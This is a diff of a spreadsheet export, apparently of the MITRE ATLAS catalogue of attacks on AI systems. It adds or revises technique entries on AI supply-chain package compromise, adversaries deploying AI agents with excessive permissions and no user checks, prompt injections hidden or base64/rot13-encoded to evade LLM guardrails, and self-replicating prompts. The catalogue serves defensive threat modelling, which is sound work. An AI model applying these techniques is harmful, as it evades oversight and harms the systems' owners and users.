+        <v>411</v>
       </c>
       <c r="M12" s="3" t="s">
-        <v>373</v>
+        <v>393</v>
       </c>
       <c r="N12" s="4" t="s">
-        <v>305</v>
+        <v>323</v>
       </c>
       <c r="P12" s="6" t="s">
-        <v>333</v>
+        <v>352</v>
       </c>
       <c r="Q12" s="4" t="s">
-        <v>410</v>
-      </c>
-      <c r="U12" s="6"/>
-      <c r="V12" s="4" t="s">
-        <v>386</v>
-      </c>
-      <c r="Z12" s="3" t="s">
-        <v>408</v>
-      </c>
-    </row>
-    <row r="13" spans="1:27">
+        <v>430</v>
+      </c>
+      <c r="V12" s="6" t="s">
+        <v>392</v>
+      </c>
+      <c r="W12" s="4" t="s">
+        <v>400</v>
+      </c>
+      <c r="AA12" s="6"/>
+      <c r="AB12" s="4" t="s">
+        <v>445</v>
+      </c>
+    </row>
+    <row r="13" spans="1:28">
       <c r="C13" s="3" t="s">
-        <v>392</v>
+        <v>412</v>
       </c>
       <c r="M13" s="3" t="s">
-        <v>375</v>
+        <v>395</v>
       </c>
       <c r="P13" s="6"/>
       <c r="Q13" s="4" t="s">
-        <v>412</v>
-      </c>
-      <c r="U13" s="3" t="s">
-        <v>427</v>
-      </c>
-    </row>
-    <row r="14" spans="1:27">
+        <v>432</v>
+      </c>
+      <c r="V13" s="6"/>
+      <c r="W13" s="4" t="s">
+        <v>406</v>
+      </c>
+      <c r="AA13" s="3" t="s">
+        <v>428</v>
+      </c>
+    </row>
+    <row r="14" spans="1:28">
       <c r="C14" s="3" t="s">
-        <v>393</v>
+        <v>413</v>
+      </c>
+      <c r="M14" s="3" t="s">
+        <v>448</v>
       </c>
       <c r="P14" s="6"/>
       <c r="Q14" s="4" t="s">
-        <v>413</v>
-      </c>
-    </row>
-    <row r="15" spans="1:27">
+        <v>433</v>
+      </c>
+      <c r="V14" s="3" t="s">
+        <v>447</v>
+      </c>
+    </row>
+    <row r="15" spans="1:28">
       <c r="C15" s="3" t="s">
-        <v>398</v>
+        <v>418</v>
       </c>
       <c r="P15" s="3" t="s">
-        <v>389</v>
-      </c>
-    </row>
-    <row r="16" spans="1:27">
+        <v>409</v>
+      </c>
+    </row>
+    <row r="16" spans="1:28">
       <c r="C16" s="3" t="s">
-        <v>411</v>
+        <v>431</v>
       </c>
     </row>
   </sheetData>
-  <mergeCells count="29">
+  <mergeCells count="30">
     <mergeCell ref="A7:A9"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
@@ -9843,10 +10342,10 @@
     <mergeCell ref="C1:D1"/>
     <mergeCell ref="E2:E5"/>
     <mergeCell ref="E1:F1"/>
-    <mergeCell ref="H4:H5"/>
+    <mergeCell ref="H5:H6"/>
     <mergeCell ref="H1:I1"/>
     <mergeCell ref="J2:J3"/>
-    <mergeCell ref="J5:J6"/>
+    <mergeCell ref="J6:J7"/>
     <mergeCell ref="J1:K1"/>
     <mergeCell ref="M5:M7"/>
     <mergeCell ref="M1:N1"/>
@@ -9854,16 +10353,17 @@
     <mergeCell ref="P10:P11"/>
     <mergeCell ref="P12:P14"/>
     <mergeCell ref="P1:Q1"/>
-    <mergeCell ref="S3:S4"/>
-    <mergeCell ref="S1:T1"/>
-    <mergeCell ref="U2:U6"/>
-    <mergeCell ref="U7:U9"/>
-    <mergeCell ref="U11:U12"/>
-    <mergeCell ref="U1:V1"/>
-    <mergeCell ref="X3:X5"/>
-    <mergeCell ref="X1:Y1"/>
-    <mergeCell ref="Z7:Z11"/>
-    <mergeCell ref="Z1:AA1"/>
+    <mergeCell ref="R1:S1"/>
+    <mergeCell ref="T3:T4"/>
+    <mergeCell ref="T1:U1"/>
+    <mergeCell ref="V2:V6"/>
+    <mergeCell ref="V7:V9"/>
+    <mergeCell ref="V12:V13"/>
+    <mergeCell ref="V1:W1"/>
+    <mergeCell ref="Y3:Y5"/>
+    <mergeCell ref="Y1:Z1"/>
+    <mergeCell ref="AA8:AA12"/>
+    <mergeCell ref="AA1:AB1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1909" uniqueCount="1041">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1919" uniqueCount="1048">
   <si>
     <t>ID</t>
   </si>
@@ -169,6 +169,9 @@
     <t>AML.T0029</t>
   </si>
   <si>
+    <t>AML.T0103</t>
+  </si>
+  <si>
     <t>AML.T0017</t>
   </si>
   <si>
@@ -610,6 +613,9 @@
     <t>attack-pattern--c4bae5b7-482f-572f-b44b-6a829b186a2e</t>
   </si>
   <si>
+    <t>attack-pattern--f8d5be4e-b5f8-5b61-bdc9-3a8818327210</t>
+  </si>
+  <si>
     <t>attack-pattern--07ba3218-6e26-5eed-8017-4a2e8c0cbd5d</t>
   </si>
   <si>
@@ -1049,6 +1055,9 @@
   </si>
   <si>
     <t>Denial of AI Service</t>
+  </si>
+  <si>
+    <t>Deploy AI Agent</t>
   </si>
   <si>
     <t>Develop Capabilities</t>
@@ -1418,10 +1427,14 @@
 [1]: https://www.microsoft.com/en-us/security/blog/2025/11/03/sesameop-novel-backdoor-uses-openai-assistants-api-for-command-and-control/</t>
   </si>
   <si>
-    <t>Most AI systems rely on a limited set of AI frameworks.
-An adversary could get access to a large number of AI systems through a comprise of one of their supply chains.
-Many AI projects also rely on other open source implementations of various algorithms.
-These can also be compromised in a targeted way to get access to specific systems.</t>
+    <t>Adversaries may target software packages that are commonly used in AI-enabled systems or are part of the AI DevOps lifecycle. This can include deep learning frameworks used to build AI models (e.g. PyTorch, TensorFlow, Jax), generative AI integration frameworks (e.g. LangChain, LangFlow), inference engines, AI DevOps tools, and Model Context Protocol servers, which give AI agents access to tools and data resources. They may also target the dependency chains of any of these software packages [\[1\]][1]. Additionally, adversaries may target specific components used by AI software such as configuration files [\[2\]][2] or example usage of AI tools, which may be distributed in Jupyter notebooks [\[3\]][3].
+Adversaries may compromise legitimate packages [\[4\]][4] or publish malicious software to a namesquatted location [\[1\]][1]. They may target package names that are hallucinated by large language models [\[5\]][5] (see: Publish Hallucinated Entities). They may also perform a "rugpull" in which they first publish a legitimate package and then publish a malicious version once they reach a critical mass of users [\[6\]][6].
+[1]: https://pytorch.org/blog/compromised-nightly-dependency/ "Compromised PyTorch-nightly dependency chain between December 25th and December 30th, 2022."
+[2]: https://www.pillar.security/blog/new-vulnerability-in-github-copilot-and-cursor-how-hackers-can-weaponize-code-agents "New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents"
+[3]: https://medium.com/mlearning-ai/careful-who-you-colab-with-fa8001f933e7 "Careful Who You Colab With: abusing google colaboratory"
+[4]: https://aws.amazon.com/security/security-bulletins/AWS-2025-015/ "Security Update for Amazon Q Developer Extension for Visual Studio Code (Version #1.84)"
+[5]: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/slopsquatting-when-ai-agents-hallucinate-malicious-packages "Slopsquatting: When AI Agents Hallucinate Malicious Packages"
+[6]: https://www.koi.ai/blog/postmark-mcp-npm-malicious-backdoor-email-theft "First Malicious MCP in the Wild: The Postmark Backdoor That's Stealing Your Emails"</t>
   </si>
   <si>
     <t>Adversaries may gain initial access to a system by compromising the unique portions of the AI supply chain.
@@ -1586,6 +1599,11 @@
     <t>Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.
 Since many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.
 Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.</t>
+  </si>
+  <si>
+    <t>Adversaries may launch AI agents in the victim's environment to execute actions on their behalf. AI agents may have access to a wide range of tools and data sources, as well as permissions to access and interact with other services and systems in the victim's environment. The adversary may leverage these capabilities to carry out their operations.
+Adversaries may configure the AI agent by providing an initial system prompt and granting access to tools, effectively defining their goals for the agent to achieve. They may deploy the agent with excessive trust permissions and disable any user interactions to ensure the agent's actions aren't blocked.
+Launching an AI agent may provide for some autonomous behavior, allowing for the agent to make decisions and determine how to achieve the adversary's goals. This also represents a loss of control for the adversary.</t>
   </si>
   <si>
     <t>Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on AI-enabled systems are not necessarily AI-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.</t>
@@ -1802,8 +1820,9 @@
 Malicious prompts may also be [Triggered](/techniques/AML.T0051.002) user actions or system events.</t>
   </si>
   <si>
-    <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
-For text inputs, this may include modifying how the instructions are rendered such as small text, text colored the same as the background, or hidden HTML elements. For multi-modal inputs, malicious instructions could be hidden in the data itself (e.g. in the pixels of an image) or in file metadata (e.g. EXIF for images, ID3 tags for audio, or document metadata).</t>
+    <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content to avoid detection from humans, large language model (LLM) guardrails, or other detection mechanisms.
+For text inputs, this may include modifying how the instructions are rendered such as small text, text colored the same as the background, or hidden HTML elements. For multi-modal inputs, malicious instructions could be hidden in the data itself (e.g. in the pixels of an image) or in file metadata (e.g. EXIF for images, ID3 tags for audio, or document metadata).
+Inputs can also be obscured via an encoding scheme such as base64 or rot13. This may bypass LLM guardrails that identify malicious content and may not be as easily identifiable as malicious to a human in the loop.</t>
   </si>
   <si>
     <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
@@ -2241,6 +2260,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0029</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0103</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0017</t>
   </si>
   <si>
@@ -2595,6 +2617,9 @@
     <t>04 November 2025</t>
   </si>
   <si>
+    <t>28 January 2026</t>
+  </si>
+  <si>
     <t>16 April 2025</t>
   </si>
   <si>
@@ -2628,6 +2653,9 @@
     <t>23 December 2025</t>
   </si>
   <si>
+    <t>29 January 2026</t>
+  </si>
+  <si>
     <t>12 January 2024</t>
   </si>
   <si>
@@ -2643,10 +2671,10 @@
     <t>06 November 2025</t>
   </si>
   <si>
+    <t>20 December 2025</t>
+  </si>
+  <si>
     <t>18 December 2025</t>
-  </si>
-  <si>
-    <t>20 December 2025</t>
   </si>
   <si>
     <t>29 April 2024</t>
@@ -3937,7 +3965,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I148"/>
+  <dimension ref="A1:I149"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -3977,28 +4005,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>156</v>
+        <v>157</v>
       </c>
       <c r="C2" t="s">
-        <v>303</v>
+        <v>305</v>
       </c>
       <c r="D2" t="s">
-        <v>450</v>
+        <v>453</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>597</v>
+        <v>601</v>
       </c>
       <c r="F2" t="s">
-        <v>744</v>
+        <v>749</v>
       </c>
       <c r="G2" t="s">
-        <v>744</v>
+        <v>749</v>
       </c>
       <c r="H2" t="s">
-        <v>775</v>
+        <v>782</v>
       </c>
       <c r="I2" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -4006,28 +4034,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>157</v>
+        <v>158</v>
       </c>
       <c r="C3" t="s">
-        <v>304</v>
+        <v>306</v>
       </c>
       <c r="D3" t="s">
-        <v>451</v>
+        <v>454</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>598</v>
+        <v>602</v>
       </c>
       <c r="F3" t="s">
-        <v>745</v>
+        <v>750</v>
       </c>
       <c r="G3" t="s">
-        <v>764</v>
+        <v>770</v>
       </c>
       <c r="H3" t="s">
-        <v>776</v>
+        <v>783</v>
       </c>
       <c r="I3" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -4035,28 +4063,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>158</v>
+        <v>159</v>
       </c>
       <c r="C4" t="s">
-        <v>305</v>
+        <v>307</v>
       </c>
       <c r="D4" t="s">
-        <v>452</v>
+        <v>455</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>599</v>
+        <v>603</v>
       </c>
       <c r="F4" t="s">
-        <v>744</v>
+        <v>749</v>
       </c>
       <c r="G4" t="s">
-        <v>765</v>
+        <v>771</v>
       </c>
       <c r="H4" t="s">
-        <v>777</v>
+        <v>784</v>
       </c>
       <c r="I4" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -4064,28 +4092,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>159</v>
+        <v>160</v>
       </c>
       <c r="C5" t="s">
-        <v>306</v>
+        <v>308</v>
       </c>
       <c r="D5" t="s">
-        <v>453</v>
+        <v>456</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>600</v>
+        <v>604</v>
       </c>
       <c r="F5" t="s">
-        <v>744</v>
+        <v>749</v>
       </c>
       <c r="G5" t="s">
-        <v>744</v>
+        <v>749</v>
       </c>
       <c r="H5" t="s">
-        <v>776</v>
+        <v>783</v>
       </c>
       <c r="I5" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -4093,28 +4121,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>160</v>
+        <v>161</v>
       </c>
       <c r="C6" t="s">
-        <v>307</v>
+        <v>309</v>
       </c>
       <c r="D6" t="s">
-        <v>454</v>
+        <v>457</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>601</v>
+        <v>605</v>
       </c>
       <c r="F6" t="s">
-        <v>746</v>
+        <v>751</v>
       </c>
       <c r="G6" t="s">
-        <v>755</v>
+        <v>760</v>
       </c>
       <c r="H6" t="s">
-        <v>778</v>
+        <v>785</v>
       </c>
       <c r="I6" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -4122,28 +4150,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>161</v>
+        <v>162</v>
       </c>
       <c r="C7" t="s">
-        <v>308</v>
+        <v>310</v>
       </c>
       <c r="D7" t="s">
-        <v>455</v>
+        <v>458</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>602</v>
+        <v>606</v>
       </c>
       <c r="F7" t="s">
-        <v>745</v>
+        <v>750</v>
       </c>
       <c r="G7" t="s">
-        <v>745</v>
+        <v>750</v>
       </c>
       <c r="H7" t="s">
-        <v>779</v>
+        <v>786</v>
       </c>
       <c r="I7" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -4151,28 +4179,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>162</v>
+        <v>163</v>
       </c>
       <c r="C8" t="s">
-        <v>309</v>
+        <v>311</v>
       </c>
       <c r="D8" t="s">
-        <v>456</v>
+        <v>459</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>603</v>
+        <v>607</v>
       </c>
       <c r="F8" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G8" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H8" t="s">
-        <v>779</v>
+        <v>786</v>
       </c>
       <c r="I8" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -4180,28 +4208,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>163</v>
+        <v>164</v>
       </c>
       <c r="C9" t="s">
-        <v>310</v>
+        <v>312</v>
       </c>
       <c r="D9" t="s">
-        <v>457</v>
+        <v>460</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>604</v>
+        <v>608</v>
       </c>
       <c r="F9" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G9" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H9" t="s">
-        <v>780</v>
+        <v>787</v>
       </c>
       <c r="I9" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -4209,28 +4237,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>164</v>
+        <v>165</v>
       </c>
       <c r="C10" t="s">
-        <v>311</v>
+        <v>313</v>
       </c>
       <c r="D10" t="s">
-        <v>458</v>
+        <v>461</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>605</v>
+        <v>609</v>
       </c>
       <c r="F10" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G10" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H10" t="s">
-        <v>781</v>
+        <v>788</v>
       </c>
       <c r="I10" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -4238,28 +4266,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>165</v>
+        <v>166</v>
       </c>
       <c r="C11" t="s">
-        <v>312</v>
+        <v>314</v>
       </c>
       <c r="D11" t="s">
-        <v>459</v>
+        <v>462</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>606</v>
+        <v>610</v>
       </c>
       <c r="F11" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G11" t="s">
-        <v>750</v>
+        <v>755</v>
       </c>
       <c r="H11" t="s">
-        <v>782</v>
+        <v>789</v>
       </c>
       <c r="I11" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -4267,28 +4295,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>166</v>
+        <v>167</v>
       </c>
       <c r="C12" t="s">
-        <v>313</v>
+        <v>315</v>
       </c>
       <c r="D12" t="s">
-        <v>460</v>
+        <v>463</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>607</v>
+        <v>611</v>
       </c>
       <c r="F12" t="s">
-        <v>748</v>
+        <v>753</v>
       </c>
       <c r="G12" t="s">
-        <v>766</v>
+        <v>772</v>
       </c>
       <c r="H12" t="s">
-        <v>783</v>
+        <v>790</v>
       </c>
       <c r="I12" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -4296,28 +4324,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>167</v>
+        <v>168</v>
       </c>
       <c r="C13" t="s">
-        <v>314</v>
+        <v>316</v>
       </c>
       <c r="D13" t="s">
-        <v>461</v>
+        <v>464</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>608</v>
+        <v>612</v>
       </c>
       <c r="F13" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G13" t="s">
-        <v>757</v>
+        <v>773</v>
       </c>
       <c r="H13" t="s">
-        <v>784</v>
+        <v>791</v>
       </c>
       <c r="I13" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="14" spans="1:9">
@@ -4325,28 +4353,28 @@
         <v>21</v>
       </c>
       <c r="B14" t="s">
-        <v>168</v>
+        <v>169</v>
       </c>
       <c r="C14" t="s">
-        <v>315</v>
+        <v>317</v>
       </c>
       <c r="D14" t="s">
-        <v>462</v>
+        <v>465</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>609</v>
+        <v>613</v>
       </c>
       <c r="F14" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G14" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H14" t="s">
-        <v>784</v>
+        <v>791</v>
       </c>
       <c r="I14" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="15" spans="1:9">
@@ -4354,28 +4382,28 @@
         <v>22</v>
       </c>
       <c r="B15" t="s">
-        <v>169</v>
+        <v>170</v>
       </c>
       <c r="C15" t="s">
-        <v>316</v>
+        <v>318</v>
       </c>
       <c r="D15" t="s">
-        <v>463</v>
+        <v>466</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>610</v>
+        <v>614</v>
       </c>
       <c r="F15" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G15" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H15" t="s">
-        <v>782</v>
+        <v>789</v>
       </c>
       <c r="I15" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="16" spans="1:9">
@@ -4383,28 +4411,28 @@
         <v>23</v>
       </c>
       <c r="B16" t="s">
-        <v>170</v>
+        <v>171</v>
       </c>
       <c r="C16" t="s">
-        <v>317</v>
+        <v>319</v>
       </c>
       <c r="D16" t="s">
-        <v>464</v>
+        <v>467</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>611</v>
+        <v>615</v>
       </c>
       <c r="F16" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G16" t="s">
-        <v>750</v>
+        <v>755</v>
       </c>
       <c r="H16" t="s">
-        <v>780</v>
+        <v>787</v>
       </c>
       <c r="I16" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="17" spans="1:9">
@@ -4412,28 +4440,28 @@
         <v>24</v>
       </c>
       <c r="B17" t="s">
-        <v>171</v>
+        <v>172</v>
       </c>
       <c r="C17" t="s">
-        <v>318</v>
+        <v>320</v>
       </c>
       <c r="D17" t="s">
-        <v>465</v>
+        <v>468</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>612</v>
+        <v>616</v>
       </c>
       <c r="F17" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G17" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H17" t="s">
-        <v>780</v>
+        <v>787</v>
       </c>
       <c r="I17" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="18" spans="1:9">
@@ -4441,28 +4469,28 @@
         <v>25</v>
       </c>
       <c r="B18" t="s">
-        <v>172</v>
+        <v>173</v>
       </c>
       <c r="C18" t="s">
-        <v>319</v>
+        <v>321</v>
       </c>
       <c r="D18" t="s">
-        <v>466</v>
+        <v>469</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>613</v>
+        <v>617</v>
       </c>
       <c r="F18" t="s">
-        <v>745</v>
+        <v>750</v>
       </c>
       <c r="G18" t="s">
-        <v>745</v>
+        <v>750</v>
       </c>
       <c r="H18" t="s">
-        <v>785</v>
+        <v>792</v>
       </c>
       <c r="I18" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="19" spans="1:9">
@@ -4470,28 +4498,28 @@
         <v>26</v>
       </c>
       <c r="B19" t="s">
-        <v>173</v>
+        <v>174</v>
       </c>
       <c r="C19" t="s">
-        <v>320</v>
+        <v>322</v>
       </c>
       <c r="D19" t="s">
-        <v>467</v>
+        <v>470</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>614</v>
+        <v>618</v>
       </c>
       <c r="F19" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G19" t="s">
-        <v>755</v>
+        <v>760</v>
       </c>
       <c r="H19" t="s">
-        <v>786</v>
+        <v>793</v>
       </c>
       <c r="I19" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="20" spans="1:9">
@@ -4499,28 +4527,28 @@
         <v>27</v>
       </c>
       <c r="B20" t="s">
-        <v>174</v>
+        <v>175</v>
       </c>
       <c r="C20" t="s">
-        <v>321</v>
+        <v>323</v>
       </c>
       <c r="D20" t="s">
-        <v>468</v>
+        <v>471</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>615</v>
+        <v>619</v>
       </c>
       <c r="F20" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G20" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H20" t="s">
-        <v>780</v>
+        <v>787</v>
       </c>
       <c r="I20" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="21" spans="1:9">
@@ -4528,28 +4556,28 @@
         <v>28</v>
       </c>
       <c r="B21" t="s">
-        <v>175</v>
+        <v>176</v>
       </c>
       <c r="C21" t="s">
-        <v>322</v>
+        <v>324</v>
       </c>
       <c r="D21" t="s">
-        <v>469</v>
+        <v>472</v>
       </c>
       <c r="E21" s="2" t="s">
-        <v>616</v>
+        <v>620</v>
       </c>
       <c r="F21" t="s">
-        <v>746</v>
+        <v>751</v>
       </c>
       <c r="G21" t="s">
-        <v>757</v>
+        <v>763</v>
       </c>
       <c r="H21" t="s">
-        <v>780</v>
+        <v>787</v>
       </c>
       <c r="I21" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="22" spans="1:9">
@@ -4557,28 +4585,28 @@
         <v>29</v>
       </c>
       <c r="B22" t="s">
-        <v>176</v>
+        <v>177</v>
       </c>
       <c r="C22" t="s">
-        <v>323</v>
+        <v>325</v>
       </c>
       <c r="D22" t="s">
-        <v>470</v>
+        <v>473</v>
       </c>
       <c r="E22" s="2" t="s">
-        <v>617</v>
+        <v>621</v>
       </c>
       <c r="F22" t="s">
-        <v>749</v>
+        <v>754</v>
       </c>
       <c r="G22" t="s">
-        <v>766</v>
+        <v>772</v>
       </c>
       <c r="H22" t="s">
-        <v>787</v>
+        <v>794</v>
       </c>
       <c r="I22" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="23" spans="1:9">
@@ -4586,28 +4614,28 @@
         <v>30</v>
       </c>
       <c r="B23" t="s">
-        <v>177</v>
+        <v>178</v>
       </c>
       <c r="C23" t="s">
-        <v>324</v>
+        <v>326</v>
       </c>
       <c r="D23" t="s">
-        <v>471</v>
+        <v>474</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>618</v>
+        <v>622</v>
       </c>
       <c r="F23" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G23" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="H23" t="s">
-        <v>788</v>
+        <v>795</v>
       </c>
       <c r="I23" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="24" spans="1:9">
@@ -4615,28 +4643,28 @@
         <v>31</v>
       </c>
       <c r="B24" t="s">
-        <v>178</v>
+        <v>179</v>
       </c>
       <c r="C24" t="s">
-        <v>325</v>
+        <v>327</v>
       </c>
       <c r="D24" t="s">
-        <v>472</v>
+        <v>475</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>619</v>
+        <v>623</v>
       </c>
       <c r="F24" t="s">
-        <v>747</v>
+        <v>752</v>
       </c>
       <c r="G24" t="s">
-        <v>767</v>
+        <v>774</v>
       </c>
       <c r="H24" t="s">
-        <v>788</v>
+        <v>795</v>
       </c>
       <c r="I24" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="25" spans="1:9">
@@ -4644,28 +4672,28 @@
         <v>32</v>
       </c>
       <c r="B25" t="s">
-        <v>179</v>
+        <v>180</v>
       </c>
       <c r="C25" t="s">
-        <v>326</v>
+        <v>328</v>
       </c>
       <c r="D25" t="s">
-        <v>473</v>
+        <v>476</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>620</v>
+        <v>624</v>
       </c>
       <c r="F25" t="s">
-        <v>750</v>
+        <v>755</v>
       </c>
       <c r="G25" t="s">
-        <v>750</v>
+        <v>755</v>
       </c>
       <c r="H25" t="s">
-        <v>787</v>
+        <v>794</v>
       </c>
       <c r="I25" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="26" spans="1:9">
@@ -4673,28 +4701,28 @@
         <v>33</v>
       </c>
       <c r="B26" t="s">
-        <v>180</v>
+        <v>181</v>
       </c>
       <c r="C26" t="s">
-        <v>327</v>
+        <v>329</v>
       </c>
       <c r="D26" t="s">
-        <v>474</v>
+        <v>477</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>621</v>
+        <v>625</v>
       </c>
       <c r="F26" t="s">
-        <v>751</v>
+        <v>756</v>
       </c>
       <c r="G26" t="s">
-        <v>748</v>
+        <v>753</v>
       </c>
       <c r="H26" t="s">
-        <v>785</v>
+        <v>792</v>
       </c>
       <c r="I26" t="s">
-        <v>798</v>
+        <v>805</v>
       </c>
     </row>
     <row r="27" spans="1:9">
@@ -4702,28 +4730,28 @@
         <v>34</v>
       </c>
       <c r="B27" t="s">
-        <v>181</v>
+        <v>182</v>
       </c>
       <c r="C27" t="s">
-        <v>328</v>
+        <v>330</v>
       </c>
       <c r="D27" t="s">
-        <v>475</v>
+        <v>478</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>622</v>
+        <v>626</v>
       </c>
       <c r="F27" t="s">
-        <v>752</v>
+        <v>757</v>
       </c>
       <c r="G27" t="s">
-        <v>768</v>
+        <v>775</v>
       </c>
       <c r="H27" t="s">
-        <v>775</v>
